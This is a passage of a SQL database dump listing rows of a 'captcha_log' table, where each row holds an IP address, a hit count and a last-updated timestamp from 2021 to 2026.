('1', '190.36.160.122', 1, '2021-11-21 20:12:54'),
('1', '190.38.19.29', 1, '2021-11-23 03:45:50'),
('1', '190.42.88.71', 1, '2021-11-02 17:25:03'),
('1', '190.69.236.249', 1, '2021-10-28 13:00:44'),
('1', '190.86.33.129', 2, '2021-11-02 20:29:25'),
('1', '191.189.23.116', 3, '2021-11-03 21:01:02'),
('1', '191.40.86.54', 2, '2022-09-04 23:27:05'),
('1', '191.82.100.233', 4, '2021-11-02 12:01:46'),
('1', '191.82.70.222', 2, '2021-11-01 05:22:46'),
('1', '192.144.39.132', 2, '2024-01-01 21:04:07'),
('1', '192.144.39.152', 3, '2023-12-13 18:55:41'),
('1', '192.144.39.173', 2, '2024-01-27 10:54:49'),
('1', '192.144.39.93', 2, '2023-12-31 13:54:37'),
('1', '192.210.150.198', 1, '2026-03-14 21:15:57'),
('1', '192.42.116.183', 1, '2026-01-11 16:06:14'),
('1', '192.42.116.212', 1, '2024-09-07 02:27:46'),
('1', '192.42.116.54', 1, '2026-04-30 22:08:21'),
('1', '193.106.109.161', 2, '2021-11-03 06:01:30'),
('1', '193.160.217.157', 1, '2022-02-08 15:22:30'),
('1', '193.189.100.195', 1, '2026-04-21 14:25:59'),
('1', '193.189.100.205', 1, '2026-03-02 01:54:11'),
('1', '193.202.16.208', 1, '2024-02-28 14:01:30'),
('1', '193.226.232.204', 2, '2021-11-02 12:25:37'),
('1', '193.246.148.201', 1, '2021-11-21 09:53:21'),
('1', '193.53.89.60', 2, '2021-11-03 13:25:21'),
('1', '193.58.177.116', 2, '2022-03-13 12:12:40'),
('1', '194.104.9.135', 1, '2024-02-22 08:17:23'),
('1', '194.186.85.102', 7, '2021-11-03 22:51:43'),
('1', '194.190.170.228', 1, '2022-02-08 15:22:39'),
('1', '194.26.29.135', 271, '2025-11-19 14:15:00'),
('1', '195.162.70.251', 3, '2021-11-22 09:58:11'),
('1', '195.208.139.77', 3, '2021-11-23 04:22:09'),
('1', '195.208.2.181', 1, '2022-02-08 15:22:35'),
('1', '195.245.244.49', 6, '2021-11-03 20:16:48'),
('1', '195.26.224.235', 4, '2025-11-18 02:29:27'),
('1', '195.26.225.209', 4, '2025-11-10 07:18:18'),
('1', '195.26.237.240', 1, '2025-08-07 13:37:19'),
('1', '195.50.200.91', 1, '2021-10-27 11:25:49'),
('1', '195.58.56.35', 1, '2021-11-03 05:29:16'),
('1', '195.58.58.54', 1, '2021-11-22 06:10:52'),
('1', '195.62.15.80', 2, '2021-11-22 09:28:55'),
('1', '195.66.156.30', 2, '2021-10-30 12:09:30'),
('1', '196.113.70.104', 1, '2021-10-28 08:55:32'),
('1', '196.170.155.51', 1, '2021-11-04 07:55:05'),
('1', '196.170.213.110', 2, '2021-10-28 09:45:25'),
('1', '196.188.181.200', 1, '2021-11-21 16:13:13'),
('1', '196.189.160.254', 1, '2021-11-22 11:48:10'),
('1', '196.191.120.60', 1, '2021-11-22 11:34:16'),
('1', '196.200.151.21', 1, '2021-11-22 11:20:30'),
('1', '196.251.81.2', 2, '2025-06-30 04:11:29'),
('1', '196.251.83.27', 2, '2025-07-02 09:12:18'),
('1', '196.251.87.128', 3, '2025-07-14 18:57:23'),
('1', '196.251.87.137', 2, '2025-09-25 23:39:17'),
('1', '196.64.125.164', 1, '2021-11-22 18:39:15'),
('1', '196.64.170.251', 1, '2021-11-01 23:38:57'),
('1', '196.65.232.116', 1, '2021-11-23 03:28:26'),
('1', '196.75.20.118', 1, '2021-11-02 22:01:39'),
('1', '196.75.209.39', 2, '2021-11-21 23:38:14'),
('1', '197.156.124.56', 1, '2021-11-22 19:10:26'),
('1', '197.157.252.253', 1, '2021-11-22 12:16:41'),
('1', '197.158.25.71', 1, '2021-10-28 10:19:58'),
('1', '197.158.26.134', 1, '2021-11-01 11:20:26'),
('1', '197.185.103.225', 1, '2021-11-22 15:41:38'),
('1', '197.185.113.69', 2, '2021-11-23 07:29:06'),
('1', '197.204.66.126', 2, '2021-11-21 13:31:12'),
('1', '197.206.111.114', 1, '2021-11-21 10:22:39'),
('1', '197.206.57.220', 1, '2021-11-01 15:15:00'),
('1', '197.220.168.10', 1, '2021-11-22 15:34:58'),
('1', '197.232.127.67', 1, '2021-10-27 11:21:21'),
('1', '197.232.246.146', 1, '2021-11-21 10:53:22'),
('1', '197.254.118.166', 12, '2021-12-03 10:02:00'),
('1', '197.27.67.104', 1, '2021-11-21 11:32:59'),
('1', '198.12.69.93', 1, '2026-02-15 12:11:03'),
('1', '198.23.221.59', 2, '2025-05-27 12:24:36'),
('1', '198.98.53.136', 1, '2024-09-07 02:28:15'),
('1', '2.149.225.21', 2, '2021-11-22 22:26:55'),
('1', '2.39.8.70', 1, '2021-11-21 19:29:29'),
('1', '2.56.139.204', 4, '2022-03-26 18:24:12'),
('1', '2.56.139.215', 2, '2022-03-01 01:17:09'),
('1', '2.56.139.218', 2, '2022-04-07 16:14:33'),
('1', '2.56.139.220', 2, '2022-03-20 22:04:11'),
('1', '2.56.139.246', 6, '2022-04-15 20:25:48'),
('1', '2.56.139.247', 2, '2022-03-27 06:08:21'),
('1', '2.57.151.210', 4, '2022-03-23 15:08:04'),
('1', '2.57.151.218', 4, '2022-04-01 07:00:03'),
('1', '2.57.151.222', 2, '2022-03-20 12:31:36'),
('1', '2.57.151.254', 1, '2022-04-04 08:22:56'),
('1', '200.216.23.94', 1, '2022-02-21 16:40:01'),
('1', '200.48.170.171', 2, '2021-11-03 15:59:27'),
('1', '200.53.198.202', 1, '2021-11-21 16:51:03'),
('1', '200.71.126.208', 1, '2025-03-14 02:25:41'),
('1', '200.87.90.237', 1, '2021-11-21 18:16:11'),
('1', '201.131.84.0', 80, '2024-05-15 21:02:20'),
('1', '201.141.210.174', 1, '2021-11-21 19:01:43'),
('1', '201.173.97.118', 2, '2022-02-18 15:33:56'),
('1', '201.183.5.204', 4, '2021-11-03 22:41:07'),
('1', '201.183.5.212', 1, '2021-11-23 05:40:23'),
('1', '201.20.66.30', 1, '2021-10-30 14:10:37'),
('1', '201.220.16.233', 2, '2021-11-02 05:39:17'),
('1', '201.220.19.138', 1, '2021-11-03 05:43:10'),
('1', '201.252.9.104', 3, '2021-11-23 01:11:28'),
('1', '201.28.105.119', 12, '2022-05-06 18:27:26'),
('1', '201.63.130.137', 2, '2022-09-01 13:39:59'),
('1', '202.124.43.25', 1, '2024-10-26 02:33:52'),
('1', '202.138.240.101', 2, '2021-11-22 05:00:20'),
('1', '202.142.69.130', 1, '2021-11-21 12:41:19'),
('1', '202.163.64.43', 1, '2021-11-21 14:15:25'),
('1', '202.166.165.106', 2, '2021-11-02 15:45:16'),
('1', '202.180.29.10', 1, '2021-11-22 10:04:53'),
('1', '202.184.163.85', 5, '2021-11-23 04:17:47'),
('1', '202.191.107.132', 1, '2021-11-21 14:02:14'),
('1', '202.21.43.186', 1, '2021-11-22 03:39:22'),
('1', '202.62.53.13', 1, '2021-11-22 04:46:08'),
('1', '202.93.153.233', 1, '2021-11-21 12:11:24'),
('1', '203.189.156.127', 3, '2024-10-30 03:28:44'),
('1', '203.212.210.28', 1, '2021-11-03 09:36:04'),
('1', '204.157.97.112', 1, '2021-10-27 11:24:39'),
('1', '204.199.166.75', 1, '2021-11-22 19:30:35'),
('1', '206.42.124.122', 2, '2021-11-23 01:12:53'),
('1', '206.62.4.250', 2, '2021-11-22 18:43:53'),
('1', '206.84.142.152', 3, '2021-11-21 17:37:35'),
('1', '210.14.96.161', 1, '2021-11-21 14:58:29'),
('1', '210.195.186.113', 1, '2021-11-22 08:31:37'),
('1', '211.250.14.78', 2, '2022-02-12 05:26:51'),
('1', '212.102.57.209', 83, '2022-12-05 21:08:40'),
('1', '212.103.119.214', 6, '2021-11-22 11:37:39'),
('1', '212.118.53.218', 1, '2025-12-04 10:33:38'),
('1', '212.129.84.1', 3, '2021-11-22 17:26:28'),
('1', '212.23.91.197', 1, '2021-11-22 11:28:03'),
('1', '212.3.125.234', 2, '2021-11-03 06:48:19'),
('1', '212.33.236.238', 2, '2021-11-03 06:21:00'),
('1', '212.34.155.126', 8, '2025-10-21 00:10:03'),
('1', '212.58.103.213', 4, '2021-11-21 17:07:54'),
('1', '212.66.63.101', 1, '2021-11-04 04:02:29'),
('1', '212.98.170.174', 17, '2024-05-15 20:33:59'),
('1', '213.110.152.97', 3, '2021-11-22 17:31:57'),
('1', '213.166.94.204', 7, '2022-04-05 23:14:14'),
('1', '213.166.94.214', 4, '2022-03-26 06:39:53'),
('1', '213.166.94.218', 2, '2022-03-03 19:13:46'),
('1', '213.166.94.223', 6, '2022-03-20 22:05:38'),
('1', '213.166.94.236', 1, '2022-04-07 16:08:13'),
('1', '213.166.94.240', 2, '2022-03-02 20:44:06'),
('1', '213.166.94.250', 4, '2022-04-02 17:20:10'),
('1', '213.166.94.252', 2, '2022-03-23 23:45:42'),
('1', '213.182.86.26', 1, '2021-11-22 08:23:16'),
('1', '213.217.17.114', 2, '2021-10-28 11:45:28'),
('1', '213.232.235.104', 2, '2023-12-07 10:58:57'),
('1', '213.232.235.91', 2, '2024-02-24 22:49:38'),
('1', '213.49.60.128', 5, '2021-11-23 00:21:14'),
('1', '213.55.224.103', 2, '2021-11-22 05:00:37'),
('1', '217.107.199.28', 2, '2021-10-27 12:02:15'),
('1', '217.107.199.94', 5, '2021-11-04 06:33:49'),
('1', '217.118.78.88', 2, '2021-11-04 07:52:49'),
('1', '217.131.83.167', 2, '2021-11-22 19:36:21'),
('1', '217.146.83.117', 1, '2024-05-15 20:56:37'),
('1', '217.165.96.152', 1, '2021-11-21 09:52:43'),
('1', '217.17.231.49', 1, '2021-11-21 23:56:54'),
('1', '217.196.25.67', 2, '2021-11-23 05:42:46'),
('1', '218.56.155.106', 2, '2022-02-12 05:26:11'),
('1', '219.70.9.111', 3, '2021-11-22 15:47:26'),
('1', '220.178.246.43', 2, '2022-02-12 05:27:55'),
('1', '220.246.57.149', 2, '2022-02-26 23:05:57'),
('1', '222.75.242.198', 2, '2021-12-21 02:48:39'),
('1', '223.178.110.202', 1, '2021-11-22 03:02:07'),
('1', '223.182.228.36', 1, '2021-11-04 08:04:37'),
('1', '223.184.28.58', 2, '2021-11-21 18:32:51'),
('1', '223.186.125.214', 1, '2021-11-23 03:41:24'),
('1', '223.187.100.97', 1, '2021-11-04 06:05:43'),
('1', '223.226.179.143', 1, '2021-11-01 12:38:04'),
('1', '223.228.233.170', 1, '2021-11-01 15:13:30'),
('1', '223.236.15.203', 2, '2021-11-22 18:20:07'),
('1', '223.24.170.194', 1, '2021-11-01 15:28:56'),
('1', '23.129.64.174', 1, '2025-12-29 04:48:14'),
('1', '23.129.64.219', 1, '2026-04-18 13:34:12'),
('1', '23.94.73.52', 1, '2022-09-03 20:10:02'),
('1', '24.139.77.57', 4, '2021-11-22 21:12:17'),
('1', '27.145.1.145', 2, '2021-11-22 02:02:48'),
('1', '27.3.88.95', 1, '2021-11-02 07:05:29'),
('1', '27.64.210.152', 1, '2021-11-21 15:03:22'),
('1', '27.71.46.133', 1, '2021-11-21 14:19:56'),
('1', '31.0.47.87', 1, '2021-11-22 00:31:45'),
('1', '31.0.49.232', 1, '2021-11-23 01:56:19'),
('1', '31.0.57.153', 1, '2021-11-21 18:19:58'),
('1', '31.131.194.236', 1, '2021-11-22 18:56:24'),
('1', '31.133.0.235', 1, '2026-04-10 17:28:07'),
('1', '31.151.134.86', 6, '2021-11-02 17:41:02'),
('1', '31.166.135.151', 2, '2021-11-22 15:12:07'),
('1', '31.173.79.97', 4, '2021-11-23 06:27:26'),
('1', '31.173.84.70', 1, '2021-10-28 13:32:24'),
('1', '31.207.209.109', 2, '2022-02-21 18:52:01'),
('1', '31.47.154.50', 5, '2021-11-22 06:07:09'),
('1', '31.47.8.11', 2, '2021-11-23 00:54:46'),
('1', '36.37.201.112', 1, '2021-10-30 05:24:16'),
('1', '36.72.212.15', 1, '2021-11-22 10:19:37'),
('1', '36.72.215.241', 1, '2021-11-21 13:52:26'),
('1', '36.72.219.227', 1, '2021-11-23 05:49:27'),
('1', '36.72.75.142', 1, '2021-10-28 10:52:04'),
('1', '36.73.250.51', 1, '2021-11-22 02:04:59'),
('1', '36.74.127.205', 1, '2021-11-02 07:56:25'),
('1', '36.74.40.198', 2, '2021-11-22 17:36:25'),
('1', '36.82.99.202', 1, '2021-11-23 05:59:06'),
('1', '36.85.108.67', 1, '2021-11-22 11:45:11'),
('1', '37.113.239.196', 1, '2021-10-28 10:41:47'),
('1', '37.120.247.217', 2, '2024-02-02 05:46:46'),
('1', '37.139.53.147', 1, '2026-04-02 18:45:57'),
('1', '37.142.41.97', 1, '2021-11-04 04:08:51'),
('1', '37.147.30.104', 7, '2021-11-23 06:04:19'),
('1', '37.157.94.135', 2, '2021-10-28 13:49:54'),
('1', '37.160.65.55', 1, '2021-11-22 22:12:31'),
('1', '37.163.25.157', 1, '2021-11-23 07:34:40'),
('1', '37.182.181.254', 1, '2021-11-21 14:35:28'),
('1', '37.19.109.68', 1, '2021-11-22 13:51:44'),
('1', '37.190.61.193', 1, '2021-11-02 06:22:29'),
('1', '37.204.176.133', 1, '2021-11-22 08:35:11'),
('1', '37.210.93.97', 1, '2021-11-21 19:58:25'),
('1', '37.220.116.149', 1, '2021-11-22 22:06:02'),
('1', '37.221.208.71', 4, '2026-02-27 06:06:37'),
('1', '37.221.65.103', 2, '2024-03-24 22:20:33'),
('1', '37.236.162.17', 1, '2021-11-02 07:38:36'),
('1', '37.236.170.25', 1, '2021-11-22 19:13:57'),
('1', '37.236.199.11', 1, '2021-11-22 17:41:16'),
('1', '37.238.188.15', 1, '2021-11-21 16:23:45'),
('1', '37.239.98.18', 1, '2021-11-22 15:29:11'),
('1', '37.239.98.34', 1, '2021-11-22 22:43:15'),
('1', '37.25.36.200', 2, '2022-12-22 15:36:42'),
('1', '37.252.90.28', 1, '2021-11-22 15:43:19'),
('1', '37.252.90.78', 3, '2021-11-01 13:15:22'),
('1', '37.40.228.5', 1, '2021-11-22 14:55:44'),
('1', '37.47.203.54', 1, '2021-10-30 14:57:17'),
('1', '37.47.207.84', 1, '2021-11-21 13:57:37'),
('1', '37.77.150.123', 49, '2026-02-27 14:30:01'),
('1', '37.77.150.124', 63, '2026-03-03 01:04:33'),
('1', '37.79.42.112', 1, '2021-11-04 07:35:29'),
('1', '37.79.42.40', 2, '2021-11-22 06:45:00'),
('1', '39.33.135.77', 1, '2021-11-22 18:24:36'),
('1', '39.33.200.23', 1, '2021-11-22 09:21:24'),
('1', '39.37.198.49', 1, '2021-11-23 02:21:55'),
('1', '39.42.102.53', 1, '2021-11-22 10:40:02'),
('1', '39.45.7.251', 1, '2021-11-21 08:47:14'),
('1', '39.50.104.206', 1, '2021-11-22 14:28:07'),
('1', '39.52.219.100', 1, '2021-11-22 19:10:52'),
('1', '41.0.58.151', 6, '2021-11-22 22:13:14'),
('1', '41.100.228.150', 1, '2021-11-21 18:55:01'),
('1', '41.101.219.129', 1, '2021-11-21 23:41:17'),
('1', '41.105.16.160', 1, '2021-11-21 23:57:24'),
('1', '41.105.76.234', 1, '2021-11-21 11:15:27'),
('1', '41.107.121.197', 1, '2021-11-22 17:41:59'),
('1', '41.107.61.175', 1, '2021-11-22 08:56:56'),
('1', '41.107.67.146', 1, '2021-11-23 08:07:18'),
('1', '41.108.101.120', 1, '2021-11-03 20:52:42'),
('1', '41.108.194.124', 1, '2021-11-22 14:31:48'),
('1', '41.108.225.56', 1, '2021-11-22 18:17:25'),
('1', '41.111.116.1', 1, '2021-11-21 17:37:32'),
('1', '41.111.68.2', 1, '2021-11-21 11:16:33'),
('1', '41.111.98.118', 1, '2021-11-22 11:46:19'),
('1', '41.162.10.18', 1, '2021-11-01 20:57:31'),
('1', '41.189.39.134', 1, '2021-10-27 11:21:31'),
('1', '41.200.76.20', 3, '2021-11-23 01:40:01'),
('1', '41.210.141.88', 2, '2021-11-03 06:30:54'),
('1', '41.211.46.80', 2, '2021-11-21 19:36:08'),
('1', '41.212.75.190', 1, '2021-11-22 15:13:39'),
('1', '41.216.201.148', 2, '2021-11-21 12:16:51'),
('1', '41.222.181.184', 1, '2021-11-22 05:31:23'),
('1', '41.222.181.72', 1, '2021-11-04 05:14:37'),
('1', '41.242.138.40', 1, '2021-11-23 01:50:33'),
('1', '41.251.177.21', 1, '2021-11-21 12:21:19'),
('1', '41.34.101.26', 1, '2021-11-21 15:20:59'),
('1', '41.46.139.111', 1, '2021-11-03 23:52:01'),
('1', '41.60.112.106', 1, '2021-10-27 12:35:44'),
('1', '41.75.188.188', 1, '2021-11-22 19:41:27'),
('1', '41.78.246.114', 1, '2021-10-28 13:38:28'),
('1', '41.96.173.180', 1, '2021-11-22 19:39:07'),
('1', '41.96.219.208', 1, '2021-11-22 08:59:22'),
('1', '41.96.45.127', 1, '2021-11-22 19:44:31'),
('1', '42.105.17.183', 1, '2021-11-21 16:59:55'),
('1', '42.111.22.121', 1, '2021-10-27 09:16:58'),
('1', '42.113.216.162', 2, '2021-11-22 05:19:43'),
('1', '42.115.110.22', 1, '2021-11-22 02:43:24'),
('1', '42.118.235.223', 4, '2021-11-23 06:29:02'),
('1', '42.118.79.89', 1, '2021-11-21 10:34:49'),
('1', '43.225.67.110', 1, '2021-11-03 00:25:32'),
('1', '43.242.116.84', 2, '2021-11-02 17:05:25'),
('1', '43.245.140.186', 1, '2021-11-22 04:59:55'),
('1', '45.123.221.6', 1, '2021-11-02 02:43:48'),
('1', '45.126.23.87', 2, '2021-10-28 09:23:21'),
('1', '45.126.74.65', 1, '2021-11-22 10:36:53'),
('1', '45.128.232.56', 2, '2023-11-26 22:37:11'),
('1', '45.132.246.245', 1, '2026-02-05 11:10:02'),
('1', '45.135.232.10', 8, '2025-05-27 14:59:40'),
('1', '45.135.232.178', 8, '2026-01-14 14:08:56'),
('1', '45.137.70.158', 1, '2026-03-27 17:52:04'),
('1', '45.146.26.106', 3, '2022-04-07 01:57:35'),
('1', '45.146.26.107', 2, '2022-03-28 11:05:48'),
('1', '45.146.26.28', 1, '2022-04-06 19:24:42'),
('1', '45.146.26.60', 2, '2022-03-31 19:51:03'),
('1', '45.146.26.62', 4, '2022-03-25 12:12:41'),
('1', '45.146.26.77', 3, '2022-04-03 21:26:37'),
('1', '45.146.26.86', 4, '2022-03-31 04:23:32'),
('1', '45.159.18.34', 5, '2021-11-23 05:27:36'),
('1', '45.160.27.74', 1, '2021-11-22 10:43:03'),
('1', '45.181.226.142', 1, '2021-11-21 14:20:02'),
('1', '45.183.94.7', 12, '2022-06-22 14:52:38'),
('1', '45.189.194.55', 18, '2022-07-29 22:56:46'),
('1', '45.195.76.154', 1, '2021-10-28 12:42:04'),
('1', '45.201.212.21', 1, '2021-11-21 16:53:21'),
('1', '45.224.105.52', 10, '2021-10-18 05:31:20'),
('1', '45.226.4.91', 1, '2021-10-30 18:34:40'),
('1', '45.227.254.33', 2949, '2024-10-08 03:42:34'),
('1', '45.250.227.68', 3, '2021-11-23 04:51:34'),
('1', '45.250.227.73', 2, '2021-11-03 12:38:58'),
('1', '45.250.227.74', 7, '2021-11-03 19:21:22'),
('1', '45.251.235.32', 1, '2021-10-30 12:36:06'),
('1', '45.5.117.199', 3, '2021-11-22 15:32:34'),
('1', '45.66.209.91', 1, '2024-03-02 06:55:02'),
('1', '45.66.35.31', 1, '2026-01-08 10:41:07'),
('1', '45.84.107.198', 1, '2026-03-02 01:55:01'),
('1', '45.84.107.55', 1, '2026-04-09 14:20:23'),
('1', '45.84.107.76', 1, '2026-04-28 00:12:35'),
('1', '45.87.249.135', 1, '2026-02-19 23:05:44'),
('1', '45.95.169.104', 1, '2026-02-02 11:22:09'),
('1', '46.0.80.70', 1, '2021-10-30 12:21:30'),
('1', '46.123.236.242', 1, '2021-10-28 11:06:21'),
('1', '46.138.3.214', 1, '2021-11-23 02:24:46'),
('1', '46.148.35.141', 4, '2024-10-01 09:49:16'),
('1', '46.163.172.75', 3, '2021-11-22 05:08:02'),
('1', '46.165.194.56', 1, '2026-03-28 09:02:42'),
('1', '46.18.0.112', 1, '2021-11-22 18:53:26'),
('1', '46.190.115.192', 1, '2021-11-04 10:26:07'),
('1', '46.2.10.30', 1, '2021-11-22 21:29:40'),
('1', '46.204.82.40', 1, '2021-11-21 15:02:52'),
('1', '46.204.84.12', 1, '2021-11-22 19:28:28'),
('1', '46.211.1.121', 1, '2021-11-02 19:08:49'),
('1', '46.211.78.240', 1, '2021-11-21 18:57:15'),
('1', '46.219.99.2', 7, '2021-11-23 01:05:10'),
('1', '46.29.166.208', 2, '2023-09-14 21:14:35'),
('1', '46.39.54.152', 1, '2021-11-01 18:01:27'),
('1', '46.39.54.155', 1, '2021-11-01 10:42:08'),
('1', '46.39.54.186', 3, '2021-11-02 18:48:36'),
('1', '46.39.54.249', 3, '2021-11-22 18:02:26'),
('1', '46.39.56.238', 2, '2021-11-02 11:36:49'),
('1', '46.43.208.68', 7, '2021-11-23 01:41:40'),
('1', '46.56.203.195', 1, '2021-11-01 12:32:00'),
('1', '46.71.9.106', 1, '2021-11-22 17:51:44'),
('1', '46.77.137.244', 1, '2021-11-01 15:59:41'),
('1', '49.144.129.61', 1, '2021-10-27 12:08:04'),
('1', '49.144.203.188', 8, '2021-11-03 16:27:44'),
('1', '49.145.103.47', 1, '2021-10-27 12:39:59'),
('1', '49.145.196.208', 1, '2021-11-04 05:43:52'),
('1', '49.145.38.195', 1, '2021-11-22 15:15:57'),
('1', '49.146.32.50', 2, '2021-11-22 09:10:44'),
('1', '49.148.241.87', 1, '2021-11-21 09:53:28'),
('1', '49.149.110.45', 3, '2021-11-21 15:57:38'),
('1', '49.149.136.133', 2, '2021-11-03 17:28:28'),
('1', '49.149.137.123', 1, '2021-11-21 15:21:00'),
('1', '49.150.11.104', 4, '2021-11-03 15:08:21'),
('1', '49.150.212.99', 1, '2021-11-01 23:14:24'),
('1', '49.205.87.54', 1, '2021-10-30 11:33:08'),
('1', '49.207.197.12', 1, '2021-10-28 16:15:54'),
('1', '49.228.171.208', 2, '2021-11-22 02:08:23'),
('1', '49.228.228.153', 1, '2021-11-23 04:54:10'),
('1', '49.228.231.244', 1, '2021-11-21 16:53:56'),
('1', '49.228.235.68', 1, '2021-11-02 04:53:48'),
('1', '49.228.242.107', 1, '2021-11-21 20:58:25'),
('1', '49.230.247.169', 1, '2021-11-23 07:39:39'),
('1', '49.230.251.184', 3, '2021-11-23 02:13:01'),
('1', '49.36.184.220', 3, '2021-11-21 17:16:26'),
('1', '49.36.185.7', 1, '2021-11-01 08:12:05'),
('1', '49.36.187.249', 1, '2021-11-22 02:54:55'),
('1', '49.36.33.251', 2, '2021-11-22 15:10:46'),
('1', '49.37.41.28', 1, '2021-10-27 09:00:25'),
('1', '5.100.193.129', 1, '2021-11-02 11:28:26'),
('1', '5.107.222.127', 1, '2021-11-22 06:16:05'),
('1', '5.152.112.208', 3, '2021-11-03 16:51:57'),
('1', '5.152.146.195', 2, '2022-02-13 06:14:38'),
('1', '5.156.159.164', 1, '2021-11-23 00:28:55'),
('1', '5.167.15.237', 11, '2021-11-23 00:16:57'),
('1', '5.175.77.0', 3, '2021-11-22 11:40:29'),
('1', '5.188.62.140', 238, '2023-09-08 03:16:36'),
('1', '5.188.62.21', 231, '2023-07-17 08:51:00'),
('1', '5.188.62.214', 48, '2022-04-01 13:29:04'),
('1', '5.188.62.26', 188, '2024-10-31 00:01:51'),
('1', '5.188.62.76', 439, '2023-06-04 19:59:28'),
('1', '5.255.110.120', 1, '2026-02-22 14:22:38'),
('1', '5.255.39.184', 2, '2021-11-22 20:36:28'),
('1', '5.29.19.79', 3, '2021-11-22 11:47:07'),
('1', '5.29.47.45', 1, '2021-11-21 16:14:36'),
('1', '5.35.69.6', 4, '2025-11-01 13:46:42'),
('1', '5.53.118.189', 1, '2021-11-22 08:50:23'),
('1', '50.28.228.20', 1, '2022-02-18 15:33:23'),
('1', '51.183.152.33', 2, '2021-11-22 08:39:54'),
('1', '51.38.225.46', 1, '2026-01-13 15:17:08'),
('1', '54.36.209.254', 1, '2024-09-07 02:24:13'),
('1', '58.11.44.198', 12, '2022-03-28 13:05:53'),
('1', '58.11.53.54', 2, '2021-10-27 14:01:41'),
('1', '58.11.87.198', 1, '2021-11-22 22:46:56'),
('1', '58.150.192.6', 8, '2022-01-22 07:32:07'),
('1', '58.186.59.131', 3, '2021-11-22 05:18:15'),
('1', '58.187.21.254', 1, '2021-11-23 01:45:08'),
('1', '58.187.243.44', 1, '2021-11-21 15:29:46'),
('1', '58.210.126.206', 2, '2022-04-10 13:10:42'),
('1', '58.216.138.114', 10, '2022-02-07 18:56:02'),
('1', '58.231.255.15', 1, '2021-11-21 08:53:15'),
('1', '58.8.10.176', 1, '2021-10-30 11:24:14'),
('1', '58.8.169.74', 2, '2021-11-21 16:09:14'),
('1', '59.153.220.14', 1, '2021-11-23 00:59:44'),
('1', '59.27.88.230', 5, '2025-12-12 08:25:21'),
('1', '59.88.17.253', 2, '2021-11-21 15:08:29'),
('1', '59.89.24.145', 1, '2021-11-22 05:28:22'),
('1', '59.92.93.54', 1, '2021-11-22 17:27:02'),
('1', '59.94.109.137', 1, '2021-10-27 11:29:43'),
('1', '59.95.14.47', 1, '2021-11-21 16:50:23'),
('1', '60.244.135.108', 5, '2021-11-22 09:40:57'),
('1', '60.52.28.212', 1, '2021-11-02 11:33:49'),
('1', '61.0.61.203', 1, '2021-11-01 07:35:22'),
('1', '61.167.105.194', 12, '2021-06-27 11:45:07'),
('1', '62.122.202.244', 2, '2021-11-23 01:38:54'),
('1', '62.177.43.154', 3, '2021-11-22 08:03:52'),
('1', '62.181.51.251', 1, '2021-11-03 16:53:06'),
('1', '62.33.83.85', 3, '2021-11-03 06:01:59'),
('1', '62.76.153.5', 2, '2022-02-26 23:43:29'),
('1', '62.85.80.243', 3, '2021-11-21 14:28:02'),
('1', '63.143.93.139', 1, '2021-11-02 17:19:50'),
('1', '64.19.81.102', 12, '2021-12-22 07:34:12'),
('1', '66.78.40.91', 1, '2026-03-10 06:53:25'),
('1', '66.96.236.24', 1, '2021-11-04 01:05:53'),
('1', '69.80.13.185', 1, '2021-11-22 00:04:43'),
('1', '72.14.98.12', 1, '2021-11-01 15:58:58'),
('1', '72.252.245.210', 2, '2021-11-22 15:18:22'),
('1', '72.255.36.194', 2, '2021-11-21 13:02:43'),
('1', '72.255.44.249', 12, '2021-11-06 09:09:50'),
('1', '72.255.5.106', 1, '2021-11-02 04:41:48'),
('1', '76.97.221.131', 1, '2021-11-23 01:28:35'),
('1', '77.110.136.42', 1, '2021-11-21 19:36:25'),
('1', '77.222.110.231', 3, '2021-11-04 09:50:20'),
('1', '77.243.25.25', 1, '2021-10-28 12:11:49'),
('1', '77.35.164.214', 1, '2023-05-13 11:41:48'),
('1', '77.35.205.116', 1, '2022-01-27 11:59:17'),
('1', '77.43.201.135', 1, '2021-11-01 07:35:53'),
('1', '77.85.0.169', 1, '2021-10-27 09:46:30'),
('1', '78.142.18.219', 1, '2024-09-07 02:24:08'),
('1', '78.154.178.14', 3, '2021-11-04 09:16:28');
INSERT INTO `captcha_log` (`type`, `value`, `count`, `updated_at`) VALUES
('1', '78.26.151.147', 1, '2021-11-03 11:53:25'),
('1', '78.26.151.151', 5, '2021-11-02 19:55:12'),
('1', '78.26.242.241', 1, '2021-11-02 10:10:12'),
('1', '78.26.243.254', 1, '2021-10-27 09:56:35'),
('1', '78.26.243.5', 1, '2021-11-22 11:40:38'),
('1', '78.26.243.87', 2, '2021-11-01 14:08:47'),
('1', '78.36.33.213', 4, '2021-11-22 04:24:47'),
('1', '78.36.38.249', 1, '2021-11-22 15:01:15'),
('1', '78.36.40.2', 3, '2021-11-22 04:57:53'),
('1', '78.40.116.193', 2, '2024-02-16 23:27:44'),
('1', '78.47.215.39', 2, '2023-11-10 10:35:13'),
('1', '78.85.135.91', 6, '2021-11-04 10:44:44'),
('1', '78.85.191.237', 2, '2021-11-22 17:54:17'),
('1', '78.88.139.49', 2, '2021-11-22 19:12:56'),
('1', '79.1.77.236', 1, '2021-11-21 08:59:35'),
('1', '79.102.132.39', 2, '2021-11-23 00:54:36'),
('1', '79.104.200.74', 3, '2021-11-03 01:00:37'),
('1', '79.106.232.69', 1, '2021-11-21 18:06:57'),
('1', '79.110.134.105', 1, '2025-03-09 21:00:32'),
('1', '79.112.167.41', 1, '2021-10-27 09:02:16'),
('1', '79.120.177.178', 1, '2021-11-22 22:01:39'),
('1', '79.133.134.97', 1, '2021-11-01 10:04:43'),
('1', '79.137.141.245', 2, '2021-11-02 11:16:58'),
('1', '79.147.99.108', 1, '2021-11-22 15:34:43'),
('1', '79.16.213.191', 1, '2021-11-21 23:40:12'),
('1', '79.184.126.108', 2, '2021-10-30 19:07:36'),
('1', '79.184.144.151', 1, '2021-11-21 14:39:13'),
('1', '79.185.193.199', 1, '2021-10-27 08:55:27'),
('1', '79.186.252.104', 2, '2021-11-21 19:39:28'),
('1', '79.52.104.120', 2, '2022-02-13 06:15:18'),
('1', '8.21.11.37', 1, '2021-10-27 08:52:17'),
('1', '80.56.247.3', 1, '2021-11-22 22:20:36'),
('1', '80.64.30.32', 118, '2025-04-06 00:33:25'),
('1', '80.82.63.104', 1, '2021-11-02 23:30:43'),
('1', '80.85.245.241', 7, '2025-11-09 09:23:54'),
('1', '80.85.246.140', 7, '2025-10-26 07:47:51'),
('1', '80.89.74.9', 2, '2021-10-28 14:00:38'),
('1', '81.196.174.100', 1, '2021-11-03 15:36:08'),
('1', '81.222.186.150', 1, '2021-11-02 16:03:29'),
('1', '81.222.186.45', 1, '2021-11-02 07:17:27'),
('1', '81.222.187.162', 1, '2021-11-01 13:27:55'),
